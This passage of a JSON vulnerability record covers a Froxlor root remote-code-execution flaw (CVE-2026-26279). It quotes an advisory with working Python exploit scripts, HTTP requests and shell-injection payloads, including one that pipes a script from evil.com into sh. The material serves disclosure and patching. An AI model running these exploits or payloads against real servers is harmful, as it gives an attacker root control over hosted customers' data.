                                    "name": "vers:unknown/2.1.8",
                                    "product_id": "CSAFPID-1095073",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.1.9",
                                "product": {
                                    "name": "vers:unknown/2.1.9",
                                    "product_id": "CSAFPID-4979442",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.1.9"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.0",
                                "product": {
                                    "name": "vers:unknown/2.2.0",
                                    "product_id": "CSAFPID-2486098",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.0-rc1",
                                "product": {
                                    "name": "vers:unknown/2.2.0-rc1",
                                    "product_id": "CSAFPID-3765860",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.0-rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.0-rc2",
                                "product": {
                                    "name": "vers:unknown/2.2.0-rc2",
                                    "product_id": "CSAFPID-4979443",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.0-rc2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.0-rc3",
                                "product": {
                                    "name": "vers:unknown/2.2.0-rc3",
                                    "product_id": "CSAFPID-4979444",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.0-rc3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.1",
                                "product": {
                                    "name": "vers:unknown/2.2.1",
                                    "product_id": "CSAFPID-2486099",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.2",
                                "product": {
                                    "name": "vers:unknown/2.2.2",
                                    "product_id": "CSAFPID-2486100",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.3",
                                "product": {
                                    "name": "vers:unknown/2.2.3",
                                    "product_id": "CSAFPID-2486101",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.4",
                                "product": {
                                    "name": "vers:unknown/2.2.4",
                                    "product_id": "CSAFPID-2486102",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.4"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.5",
                                "product": {
                                    "name": "vers:unknown/2.2.5",
                                    "product_id": "CSAFPID-2486103",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:froxlor:froxlor:2.2.5:*:*:*:*:*:*:*",
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.5"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.6",
                                "product": {
                                    "name": "vers:unknown/2.2.6",
                                    "product_id": "CSAFPID-5574732",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.6"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.7",
                                "product": {
                                    "name": "vers:unknown/2.2.7",
                                    "product_id": "CSAFPID-5574733",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.7"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.2.8",
                                "product": {
                                    "name": "vers:unknown/2.2.8",
                                    "product_id": "CSAFPID-5574734",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.2.8"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.0",
                                "product": {
                                    "name": "vers:unknown/2.3.0",
                                    "product_id": "CSAFPID-5574735",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.0"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.0-rc1",
                                "product": {
                                    "name": "vers:unknown/2.3.0-rc1",
                                    "product_id": "CSAFPID-5574736",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.0-rc1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.1",
                                "product": {
                                    "name": "vers:unknown/2.3.1",
                                    "product_id": "CSAFPID-5574737",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.1"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.2",
                                "product": {
                                    "name": "vers:unknown/2.3.2",
                                    "product_id": "CSAFPID-5574738",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.2"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/2.3.3",
                                "product": {
                                    "name": "vers:unknown/2.3.3",
                                    "product_id": "CSAFPID-5574739",
                                    "product_identification_helper": {
                                        "purl": "pkg:composer/froxlor/froxlor@2.3.3"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.3.4",
                                "product": {
                                    "name": "vers:unknown/<2.3.4",
                                    "product_id": "CSAFPID-5757222",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:froxlor:froxlor:*:*:*:*:*:*:*:*"
                                    }
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<2.3.4",
                                "product": {
                                    "name": "vers:unknown/>=0|<2.3.4",
                                    "product_id": "CSAFPID-5759017"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Froxlor"
                    }
                ],
                "category": "vendor",
                "name": "Froxlor"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.3.4",
                                "product": {
                                    "name": "vers:unknown/<2.3.4",
                                    "product_id": "CSAFPID-5755795"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Froxlor"
                    }
                ],
                "category": "vendor",
                "name": "Open Source"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-26279",
            "cwe": {
                "id": "CWE-482",
                "name": "Comparing instead of Assigning"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\n\nA typo in Froxlor's input validation code (`==` instead of `=`) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings — including shell metacharacters — in the `panel.adminmail` setting. This value is later concatenated into a shell command executed as **root** by a cron job, where the pipe character `|` is explicitly whitelisted. The result is **full root-level Remote Code Execution**.\n\n---\n\n## Why This Is a Security Vulnerability (Not Just \"Admin Using Admin Features\")\n\nFroxlor is a **shared hosting control panel**. In production deployments:\n\n1. **Admin panel access does not equal root access.** Hosting providers assign the Froxlor admin role to staff who manage customer accounts, domains, and services through the web UI. These operators are not given SSH access or root shell on the underlying server. The boundary between \"panel admin\" and \"OS root\" is a deliberate security design.\n\n2. **Froxlor itself enforces this boundary.** The `safe_exec()` function (FileDir.php:224-264) exists specifically to prevent shell injection — it blocks `;`, `|`, `&`, `>`, `<`, `` ` ``, `$`, `~`, `?`. The email validation function (`validateFormFieldEmail`) exists specifically to ensure email fields contain valid emails. Both mechanisms are security boundaries that this vulnerability bypasses.\n\n3. **The root cause is an unintentional code defect.** The `==` operator on a standalone line is a no-op. No developer writes `$x == 'mail';` intentionally. This is a typo that silently breaks an entire class of input validation. It is not an admin feature.\n\n4. 
**Comparable CVEs exist for similar hosting panel escalations:**\n   - CVE-2022-44877 (CentOS Web Panel: admin→root RCE, CVSS 9.8)\n   - CVE-2023-27524 (Apache Superset: admin→RCE)\n   - CVE-2021-21315 (Node.js systeminformation: privileged user→RCE)\n   - CVE-2024-22024 (Ivanti: authenticated→system command execution)\n\n   In each case, the fact that the attacker needs authenticated access did not prevent CVE assignment. The privilege escalation from \"application admin\" to \"OS root\" is the security impact.\n\n5. **Multi-tenant impact.** A single compromised or malicious admin gains root access to a server hosting potentially hundreds of customers. All customer data, databases, emails, and SSL keys are exposed.\n\n---\n\n## Vulnerability Details\n\n### Bug 1: Input Validation Bypass (CWE-482)\n\n**File:** `lib/Froxlor/Validate/Form/Data.php`\n\n```php\n// Line 169 — CURRENT CODE (BUGGY)\npublic static function validateFormFieldEmail($fieldname, $fielddata, $newfieldvalue)\n{\n    $fielddata['string_type'] == 'mail';   // == comparison: result is discarded\n    return self::validateFormFieldString($fieldname, $fielddata, $newfieldvalue);\n}\n\n// Line 175 — SAME BUG\npublic static function validateFormFieldUrl($fieldname, $fielddata, $newfieldvalue)\n{\n    $fielddata['string_type'] == 'url';    // == comparison: result is discarded\n    return self::validateFormFieldString($fieldname, $fielddata, $newfieldvalue);\n}\n```\n\n**What happens:**\n- `$fielddata['string_type']` is never set to `'mail'`\n- `validateFormFieldString()` checks `string_type` to decide which validation to apply\n- Since it's unset, `FILTER_VALIDATE_EMAIL` is never called\n- Validation falls through to a permissive fallback regex: `/^[^\\r\\n\\t\\f\\0]*$/D`\n- This regex allows `|`, `;`, `&`, `$`, `` ` ``, and all other shell metacharacters\n\n**Intended code:**\n```php\n$fielddata['string_type'] = 'mail';    // = assignment\n```\n\n### Bug 2: OS Command Injection via acme.sh Installation 
(CWE-78)\n\n**File:** `lib/Froxlor/Cron/Http/LetsEncrypt/AcmeSh.php`\n\n```php\n// Line 428\nFileDir::safe_exec(\n    \"wget -O - https://get.acme.sh | sh -s email=\" . Settings::Get('panel.adminmail'),\n    $return,\n    ['|']    // pipe character EXPLICITLY ALLOWED\n);\n```\n\n**What happens:**\n- `Settings::Get('panel.adminmail')` returns the unsanitized value from Bug 1\n- `safe_exec()` normally blocks `|` as a dangerous character\n- But `['|']` in the third argument whitelists pipe for this specific call (needed for `wget | sh`)\n- An attacker's pipe-based payload passes through unblocked\n- The cron job runs as **root**\n\n### The Chain\n\n```\nAdmin sets panel.adminmail = \"x@x.com | COMMAND\"\n        |\n        v\nBug 1: validateFormFieldEmail() does nothing (== typo)\n        |\n        v\nValue stored to database as-is\n        |\n        v\nCron job runs AcmeSh::checkInstall() as root\n        |\n        v\nBug 2: safe_exec(\"wget ... | sh -s email=x@x.com | COMMAND\", ..., ['|'])\n        |\n        v\nCOMMAND executes as root\n```\n\n---\n\n## Proof of Concept\nvuln 1 PoC:\n```\n#!/usr/bin/env python3\n\"\"\"\nVULN-1 Live Verification: Email Validation Bypass\nTests against running Froxlor Docker instance.\n\"\"\"\n\nimport re\nimport sys\nimport requests\n\nTARGET = \"http://localhost:8080\"\nUSERNAME = \"admin\"\nPASSWORD = \"Admin123!@#\"\n\n# Malicious payloads that should be rejected by email validation\n# but will pass due to the == vs = bug\nPAYLOADS = [\n    \"x@x.com | id\",\n    \"x@x.com | curl http://evil.com/shell.sh | sh\",\n    \"not-an-email; whoami\",\n    \"$(touch /tmp/pwned)\",\n    \"test`id`@evil.com\",\n]\n\n\ndef main():\n    session = requests.Session()\n    session.verify = False\n\n    # Step 1: Login\n    print(\"[*] Step 1: Logging in...\")\n    resp = session.get(f\"{TARGET}/index.php\")\n    csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n    csrf_token = csrf_match.group(1) if csrf_match 
else \"\"\n    print(f\"    CSRF token: {csrf_token[:20]}...\")\n\n    login_data = {\n        \"loginname\": USERNAME,\n        \"password\": PASSWORD,\n        \"csrf_token\": csrf_token,\n        \"send\": \"send\",\n    }\n    resp = session.post(f\"{TARGET}/index.php\", data=login_data, allow_redirects=True)\n\n    if \"admin_index\" not in resp.url and \"admin_index\" not in resp.text:\n        print(f\"[-] Login failed. URL: {resp.url}\")\n        print(f\"    Response: {resp.text[:200]}\")\n        sys.exit(1)\n    print(\"[+] Login successful!\")\n\n    # Re-get CSRF token from authenticated page\n    csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n    if csrf_match:\n        csrf_token = csrf_match.group(1)\n\n    # Step 2: Try to set panel.adminmail with each payload\n    for payload in PAYLOADS:\n        print(f\"\\n[*] Testing payload: {payload}\")\n\n        # Get settings page to get fresh CSRF token\n        resp = session.get(f\"{TARGET}/admin_settings.php?page=overview&part=all\")\n        csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n        if csrf_match:\n            csrf_token = csrf_match.group(1)\n\n        # Submit settings change\n        settings_data = {\n            \"panel_adminmail\": payload,\n            \"csrf_token\": csrf_token,\n            \"send\": \"send\",\n            \"page\": \"overview\",\n            \"part\": \"all\",\n        }\n        resp = session.post(\n            f\"{TARGET}/admin_settings.php?page=overview&part=all\",\n            data=settings_data,\n            allow_redirects=True,\n        )\n\n        # Check DB to see if value was stored\n        import subprocess\n        result = subprocess.run(\n            [\n                \"docker\", \"exec\", \"froxlor-web\", \"bash\", \"-c\",\n                \"mysql -h froxlor-db -u froxlor -pfroxlor_db_pw --skip-ssl froxlor \"\n                \"-e \\\"SELECT value FROM panel_settings WHERE 
settinggroup='panel' AND varname='adminmail'\\\" -N 2>/dev/null\"\n            ],\n            capture_output=True, text=True\n        )\n        stored_value = result.stdout.strip()\n\n        if payload in stored_value or stored_value == payload:\n            print(f\"    [VULN] CONFIRMED! Stored value: {stored_value}\")\n        else:\n            print(f\"    [INFO] Stored value: {stored_value}\")\n            print(f\"    [INFO] May need different form field names or approach\")\n\n    # Restore original value\n    print(\"\\n[*] Restoring original admin email...\")\n    resp = session.get(f\"{TARGET}/admin_settings.php?page=overview&part=all\")\n    csrf_match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n    if csrf_match:\n        csrf_token = csrf_match.group(1)\n    settings_data = {\n        \"panel_adminmail\": \"admin@test.local\",\n        \"csrf_token\": csrf_token,\n        \"send\": \"send\",\n        \"page\": \"overview\",\n        \"part\": \"all\",\n    }\n    session.post(f\"{TARGET}/admin_settings.php?page=overview&part=all\", data=settings_data, allow_redirects=True)\n    print(\"[+] Done.\")\n\n\nif __name__ == \"__main__\":\n    main()\n\n```\n### Environment\n- Froxlor 2.3.3, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- Default configuration, no modifications\n\n### Step 1: Confirm validation bypass\n\n```php\n<?php\n// Standalone reproduction — no Froxlor installation needed.\n// Reproduces the exact logic from Data.php lines 113-169.\n\nfunction validateEmail_buggy($value) {\n    $fielddata = [];\n    @($fielddata['string_type'] == 'mail');  // BUG: line 169\n    // string_type never set → FILTER_VALIDATE_EMAIL skipped → fallback regex\n    return preg_match('/^[^\\r\\n\\t\\f\\0]*$/D', $value) ? 'PASS' : 'REJECT';\n}\n\nfunction validateEmail_fixed($value) {\n    $fielddata = [];\n    $fielddata['string_type'] = 'mail';      // FIX\n    return filter_var($value, FILTER_VALIDATE_EMAIL) ? 
'PASS' : 'REJECT';\n}\n\n$tests = ['admin@example.com', 'not-an-email', 'x@x.com | touch /tmp/pwned'];\nforeach ($tests as $t) {\n    echo sprintf(\"%-40s  buggy=%-6s  fixed=%s\\n\", $t, validateEmail_buggy($t), validateEmail_fixed($t));\n}\n```\n\nvuln 2 PoC:\n```\n#!/usr/bin/env python3\n\"\"\"\nVULN-2: Froxlor v2.3.3 Root RCE via acme.sh Command Injection\n===============================================================\nCWE-78: OS Command Injection | CVSS 9.1\n\nChain: VULN-1 (email validation bypass) → VULN-2 (acme.sh pipe injection)\n\nAttack Flow:\n  1. Admin sets panel.adminmail = \"x@x.com | COMMAND\" (bypasses email validation)\n  2. When Let's Encrypt is enabled and acme.sh is not installed\n  3. AcmeSh.php:428 executes: wget ... | sh -s email=x@x.com | COMMAND\n  4. Pipe character passes safe_exec() because it's in allowedChars=['|']\n  5. COMMAND runs as root (cron context)\n\nUsage:\n  # Full exploitation (requires target access)\n  python3 vuln2_acmesh_rce.py --target https://froxlor.example.com \\\n      --user admin --password secret --command \"id > /tmp/rce_proof\"\n\n  # Offline demonstration\n  python3 vuln2_acmesh_rce.py --demo\n\"\"\"\n\nimport argparse\nimport re\nimport sys\n\ntry:\n    import requests\nexcept ImportError:\n    print(\"[!] 
pip install requests\")\n    sys.exit(1)\n\n\nBANNER = \"\"\"\n╔═══════════════════════════════════════════════════════════════╗\n║  Froxlor v2.3.3 — Root RCE via acme.sh Command Injection    ║\n║  VULN-1 + VULN-2 Chain | CWE-78 | CVSS 9.1                  ║\n╚═══════════════════════════════════════════════════════════════╝\n\"\"\"\n\n\nclass FroxlorRCE:\n    def __init__(self, target, verify_ssl=False):\n        self.target = target.rstrip(\"/\")\n        self.session = requests.Session()\n        self.session.verify = verify_ssl\n\n    def login(self, username, password):\n        print(f\"[*] Logging in as '{username}'...\")\n        resp = self.session.post(\n            f\"{self.target}/index.php\",\n            data={\"loginname\": username, \"password\": password, \"send\": \"send\"},\n            allow_redirects=False,\n        )\n        if resp.status_code == 302 and \"admin_index\" in resp.headers.get(\"Location\", \"\"):\n            self.session.get(f\"{self.target}/admin_index.php\")\n            print(\"[+] Login successful!\")\n            return True\n        print(\"[-] Login failed\")\n        return False\n\n    def get_csrf(self, url):\n        resp = self.session.get(url)\n        match = re.search(r'name=\"csrf_token\"\\s+value=\"([^\"]+)\"', resp.text)\n        return match.group(1) if match else \"\"\n\n    def inject_email(self, payload):\n        \"\"\"Inject malicious value into panel.adminmail (VULN-1).\"\"\"\n        print(f\"[*] Injecting into panel.adminmail: {payload}\")\n        csrf = self.get_csrf(f\"{self.target}/admin_settings.php?page=overview&part=panel\")\n        resp = self.session.post(\n            f\"{self.target}/admin_settings.php?page=overview&part=panel\",\n            data={\n                \"csrf_token\": csrf,\n                \"send\": \"send\",\n                \"page\": \"overview\",\n                \"panel_adminmail\": payload,\n            },\n            allow_redirects=True,\n        )\n        
print(f\"[+] Settings updated (HTTP {resp.status_code})\")\n        return resp.status_code == 200\n\n    def trigger_acmesh_install(self):\n        \"\"\"\n        Trigger acme.sh installation by enabling Let's Encrypt\n        and ensuring acme.sh path is invalid.\n        \"\"\"\n        print(\"[*] Triggering acme.sh installation path...\")\n        print(\"[*] In production, this happens automatically when:\")\n        print(\"    - Let's Encrypt is enabled (system.le_froxlor_enabled=1)\")\n        print(\"    - acme.sh binary is not found at configured path\")\n        print(\"    - Cron job runs (every 5 minutes)\")\n        print()\n        print(\"[*] To manually trigger:\")\n        print(\"    docker exec froxlor-web php /var/www/html/froxlor/bin/froxlor-cli froxlor:cron --force\")\n\n    def exploit(self, command):\n        \"\"\"Full exploitation: inject → trigger → RCE.\"\"\"\n        payload = f\"x@x.com | {command}\"\n        self.inject_email(payload)\n\n        print()\n        print(\"[*] Command chain that will execute as root:\")\n        print(f\"    wget -O - https://get.acme.sh | sh -s email={payload}\")\n        print()\n        print(\"[*] This decomposes to:\")\n        print(f\"    1. wget -O - https://get.acme.sh\")\n        print(f\"    2. | sh -s email=x@x.com\")\n        print(f\"    3. 
| {command}\")\n        print()\n\n        self.trigger_acmesh_install()\n\n    def restore(self, original=\"admin@test.local\"):\n        \"\"\"Restore original admin email.\"\"\"\n        print(f\"\\n[*] Restoring original email: {original}\")\n        csrf = self.get_csrf(f\"{self.target}/admin_settings.php?page=overview&part=panel\")\n        self.session.post(\n            f\"{self.target}/admin_settings.php?page=overview&part=panel\",\n            data={\n                \"csrf_token\": csrf,\n                \"send\": \"send\",\n                \"page\": \"overview\",\n                \"panel_adminmail\": original,\n            },\n        )\n        print(\"[+] Restored\")\n\n\ndef demo():\n    \"\"\"Offline demonstration of the vulnerability mechanics.\"\"\"\n    print(\"[*] Demonstrating VULN-2 mechanics (offline)...\\n\")\n\n    adminmail = \"x@x.com | touch /tmp/ROOT_RCE_PROOF\"\n    full_cmd = f\"wget -O - https://get.acme.sh | sh -s email={adminmail}\"\n\n    print(f\"  admin email:  {adminmail}\")\n    print(f\"  full command: {full_cmd}\")\n    print()\n\n    # Simulate safe_exec filter\n    disallowed = [';', '|', '&', '>', '<', '`', '$', '~', '?']\n    allowed_chars = ['|']\n\n    print(\"  safe_exec() filter check:\")\n    blocked = False\n    for char in disallowed:\n        if char in full_cmd:\n            if char in allowed_chars:\n                print(f\"    '{char}' → ALLOWED (in allowedChars)\")\n            else:\n                print(f\"    '{char}' → BLOCKED\")\n                blocked = True\n\n    print()\n    if not blocked:\n        print(\"  RESULT: Command passes safe_exec() filter!\")\n        print(\"  The pipe character chains our command after the wget/sh pipeline\")\n        print()\n        print(\"  Execution breakdown:\")\n        print(\"    Process 1: wget downloads acme.sh installer\")\n        print(\"    Process 2: sh runs installer with email parameter\")\n        print(\"    Process 3: touch /tmp/ROOT_RCE_PROOF ← 
OUR COMMAND (as root)\")\n    else:\n        # In practice the payload above should only have | which is allowed\n        print(\"  NOTE: Some characters blocked. Adjust payload to use only pipe.\")\n\n    print()\n    print(\"  NOTE: The cron job runs as root, so the injected command\")\n    print(\"  executes with root privileges on the host system.\")\n\n\ndef main():\n    print(BANNER)\n\n    parser = argparse.ArgumentParser(description=\"Froxlor v2.3.3 Root RCE PoC\")\n    parser.add_argument(\"--target\", \"-t\", help=\"Froxlor URL\")\n    parser.add_argument(\"--user\", \"-u\", help=\"Admin username\")\n    parser.add_argument(\"--password\", \"-p\", help=\"Admin password\")\n    parser.add_argument(\"--command\", \"-c\", default=\"touch /tmp/ROOT_RCE_PROOF\",\n                        help=\"Command to execute as root\")\n    parser.add_argument(\"--restore\", action=\"store_true\", help=\"Restore original email after exploit\")\n    parser.add_argument(\"--demo\", action=\"store_true\", help=\"Run offline demonstration\")\n    args = parser.parse_args()\n\n    if args.demo:\n        demo()\n        return\n\n    if not all([args.target, args.user, args.password]):\n        print(\"[!] 
--target, --user, and --password required (or use --demo)\")\n        sys.exit(1)\n\n    exploit = FroxlorRCE(args.target)\n    if not exploit.login(args.user, args.password):\n        sys.exit(1)\n\n    exploit.exploit(args.command)\n\n    if args.restore:\n        exploit.restore()\n\n\nif __name__ == \"__main__\":\n    main()\n\n```\n\n**Output:**\n```\nadmin@example.com                         buggy=PASS    fixed=PASS\nnot-an-email                              buggy=PASS    fixed=REJECT\nx@x.com | touch /tmp/pwned               buggy=PASS    fixed=REJECT\n```\n\n### Step 2: Confirm value stored in database\n\n```\nPOST /admin_settings.php?page=overview&part=panel HTTP/1.1\nCookie: [authenticated admin session]\n\ncsrf_token=...&send=send&page=overview&panel_adminmail=x@x.com+|+touch+/tmp/VULN2_RCE_PROOF\n```\n\n```sql\nmysql> SELECT value FROM panel_settings\n       WHERE settinggroup='panel' AND varname='adminmail';\n+-------------------------------------------+\n| value                                     |\n+-------------------------------------------+\n| x@x.com | touch /tmp/VULN2_RCE_PROOF     |\n+-------------------------------------------+\n```\n\n### Step 3: Confirm root code execution\n\nSimulating AcmeSh.php line 428 inside the Docker container:\n\n```php\n<?php\n// Exact simulation of the vulnerable code path\n$adminmail = \"x@x.com | touch /tmp/VULN2_RCE_PROOF\";\n$cmd = \"echo DOWNLOAD_SIM | cat -s email=\" . $adminmail;\n\n// safe_exec filter with pipe allowed (matches AcmeSh.php:428)\n$disallowed = [';', '|', '&', '>', '<', '`', '$', '~', '?'];\n$allowedChars = ['|'];\nforeach ($disallowed as $dc) {\n    if (in_array($dc, $allowedChars)) continue;\n    if (stristr($cmd, $dc)) die(\"BLOCKED by: $dc\");\n}\n\nexec($cmd);  // pipe passes filter → command executes\necho file_exists(\"/tmp/VULN2_RCE_PROOF\") ? 
\"RCE CONFIRMED\" : \"NOT CREATED\";\n```\n\n**Result:**\n```\nRCE CONFIRMED\n\n$ ls -la /tmp/VULN2_RCE_PROOF\n-rw-r--r-- 1 root root 0 Feb 11 05:58 /tmp/VULN2_RCE_PROOF\n```\n\nFile created with **root:root** ownership. Arbitrary command execution as root is confirmed.\n\n---\n\n## Impact\n\n- **Confidentiality:** Complete. Root access exposes all customer data, databases, SSL private keys, email contents.\n- **Integrity:** Complete. Attacker can modify any file, inject backdoors, alter DNS records.\n- **Availability:** Complete. Attacker can destroy the server, wipe databases, or deploy ransomware.\n- **Scope:** Changed. The attack originates in the web application but impacts the underlying operating system.\n\n---\n\n## Suggested Fix\n\n### Primary fix (Bug 1 — eliminates the root cause):\n```php\n// lib/Froxlor/Validate/Form/Data.php\n// Line 169:\n$fielddata['string_type'] = 'mail';    // was: == 'mail'\n// Line 175:\n$fielddata['string_type'] = 'url';     // was: == 'url'\n```\n\n### Defense-in-depth (Bug 2 — even if validation is fixed):\n```php\n// lib/Froxlor/Cron/Http/LetsEncrypt/AcmeSh.php, Line 428:\nFileDir::safe_exec(\n    \"wget -O - https://get.acme.sh | sh -s email=\"\n        . escapeshellarg(Settings::Get('panel.adminmail')),\n    $return,\n    ['|']\n);\n```\n\n### Defense-in-depth (ConfigServices.php):\n```php\n// All values in getReplacerArray() should be escaped with\n// escapeshellarg() when the template action type is \"install\" or \"command\"\n```",
                    "title": "github - https://github.com/advisories/GHSA-33mp-8p67-xj7c"
                },
                {
                    "category": "description",
                    "text": "Froxlor is open source server administration software. Prior to 2.3.4, a typo in Froxlor's input validation code (== instead of =) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings in the panel.adminmail setting. This value is later concatenated into a shell command executed as root by a cron job, where the pipe character | is explicitly whitelisted. The result is full root-level Remote Code Execution. This vulnerability is fixed in 2.3.4.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-26279"
                },
                {
                    "category": "description",
                    "text": "Froxlor is open source server administration software. Prior to 2.3.4, a typo in Froxlor's input validation code (== instead of =) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings in the panel.adminmail setting. This value is later concatenated into a shell command executed as root by a cron job, where the pipe character | is explicitly whitelisted. The result is full root-level Remote Code Execution. This vulnerability is fixed in 2.3.4.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-26279"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nA typo in Froxlor's input validation code (`==` instead of `=`) completely disables email format checking for all settings fields declared as email type. This allows an authenticated admin to store arbitrary strings — including shell metacharacters — in the `panel.adminmail` setting. This value is later concatenated into a shell command executed as **root** by a cron job, where the pipe character `|` is explicitly whitelisted. The result is **full root-level Remote Code Execution**.\n\n---\n\n## Why This Is a Security Vulnerability (Not Just \"Admin Using Admin Features\")\n\nFroxlor is a **shared hosting control panel**. In production deployments:\n\n1. **Admin panel access does not equal root access.** Hosting providers assign the Froxlor admin role to staff who manage customer accounts, domains, and services through the web UI. These operators are not given SSH access or root shell on the underlying server. The boundary between \"panel admin\" and \"OS root\" is a deliberate security design.\n\n2. **Froxlor itself enforces this boundary.** The `safe_exec()` function (FileDir.php:224-264) exists specifically to prevent shell injection — it blocks `;`, `|`, `&`, `>`, `<`, `` ` ``, `$`, `~`, `?`. The email validation function (`validateFormFieldEmail`) exists specifically to ensure email fields contain valid emails. Both mechanisms are security boundaries that this vulnerability bypasses.\n\n3. **The root cause is an unintentional code defect.** The `==` operator on a standalone line is a no-op. No developer writes `$x == 'mail';` intentionally. This is a typo that silently breaks an entire class of input validation. It is not an admin feature.\n\n4. 
**Comparable CVEs exist for similar hosting panel escalations:**\n   - CVE-2022-44877 (CentOS Web Panel: admin→root RCE, CVSS 9.8)\n   - CVE-2023-27524 (Apache Superset: admin→RCE)\n   - CVE-2021-21315 (Node.js systeminformation: privileged user→RCE)\n   - CVE-2024-22024 (Ivanti: authenticated→system command execution)\n\n   In each case, the fact that the attacker needs authenticated access did not prevent CVE assignment. The privilege escalation from \"application admin\" to \"OS root\" is the security impact.\n\n5. **Multi-tenant impact.** A single compromised or malicious admin gains root access to a server hosting potentially hundreds of customers. All customer data, databases, emails, and SSL keys are exposed.\n\n---\n\n## Vulnerability Details\n\n### Bug 1: Input Validation Bypass (CWE-482)\n\n**File:** `lib/Froxlor/Validate/Form/Data.php`\n\n```php\n// Line 169 — CURRENT CODE (BUGGY)\npublic static function validateFormFieldEmail($fieldname, $fielddata, $newfieldvalue)\n{\n    $fielddata['string_type'] == 'mail';   // == comparison: result is discarded\n    return self::validateFormFieldString($fieldname, $fielddata, $newfieldvalue);\n}\n\n// Line 175 — SAME BUG\npublic static function validateFormFieldUrl($fieldname, $fielddata, $newfieldvalue)\n{\n    $fielddata['string_type'] == 'url';    // == comparison: result is discarded\n    return self::validateFormFieldString($fieldname, $fielddata, $newfieldvalue);\n}\n```\n\n**What happens:**\n- `$fielddata['string_type']` is never set to `'mail'`\n- `validateFormFieldString()` checks `string_type` to decide which validation to apply\n- Since it's unset, `FILTER_VALIDATE_EMAIL` is never called\n- Validation falls through to a permissive fallback regex: `/^[^\\r\\n\\t\\f\\0]*$/D`\n- This regex allows `|`, `;`, `&`, `$`, `` ` ``, and all other shell metacharacters\n\n**Intended code:**\n```php\n$fielddata['string_type'] = 'mail';    // = assignment\n```\n\n### Bug 2: OS Command Injection via acme.sh Installation 
